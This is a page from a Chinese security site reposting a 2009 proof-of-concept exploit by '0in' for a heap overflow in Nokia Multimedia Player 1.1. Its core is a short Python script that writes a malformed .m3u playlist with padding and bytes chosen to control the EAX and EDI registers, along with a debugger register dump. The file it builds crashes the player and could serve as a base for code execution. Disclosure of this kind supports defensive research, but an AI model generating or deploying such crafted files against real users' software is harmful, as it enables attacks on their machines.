首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit
来源:http://www.Dark-Coders.pl 作者:0in 发布时间:2009-02-05  
# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit
# by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]
#   http://www.Dark-Coders.pl
#   Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me.. "to unicode.")
#   Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH
#       Nokia Multimedia Player is a element of Nokia PC Suite packet.
#       DOWNLOAD:http://europe.nokia.com/A4144905
#           Vuln:
#                   This is heap overflow vuln, we can control EAX & EDI registers
#                   (on my Windows XP sp3) with UNICODE chars...
#           DEBUG:
#                       "Access violation when reading [00130013]" 
#                        EAX 00130013  <- ! 
#                        EDX 00000000
#                        EBX 00970000
#                        ESP 0012F96C
#                        EBP 0012FB8C
#                        ESI 00AD26B0
#                        EDI 00900011  <- ! 
#                        EIP 7C910CB0 ntdll.7C910CB0
#!/usr/bin/python
eax="\x13\x13" # eax : 00130013
edi="\x11\x90"  # edi : 00900011
buf="F"*261
buf+=edi+eax
buf+="B"*235
file_name="spl0.m3u"
ce=buf
f=open(file_name,'w')
f.write(ce)
f.close()
print 'PoC created!'

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Euphonics Audio Player v1.0 (.
·UltraVNC/TightVNC Multiple VNC
·MetaBBS version 0.11 change ad
·StreamDown version 6.4.3 local
·dBpowerAMP Audio Player 2 .PLS
·LCPlayer proof of concept deni
·FeedMon 2.7.0.0 outline Tag Bu
·Amaya Web Browser 11 (bdo tag)
·txtBB <= 1.0 RC3 HTML/JS Injec
·Amaya Web Browser 11 (bdo tag)
·Simple PHP News version 1.0 Fi
·Free Download Manager 2.5/3.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved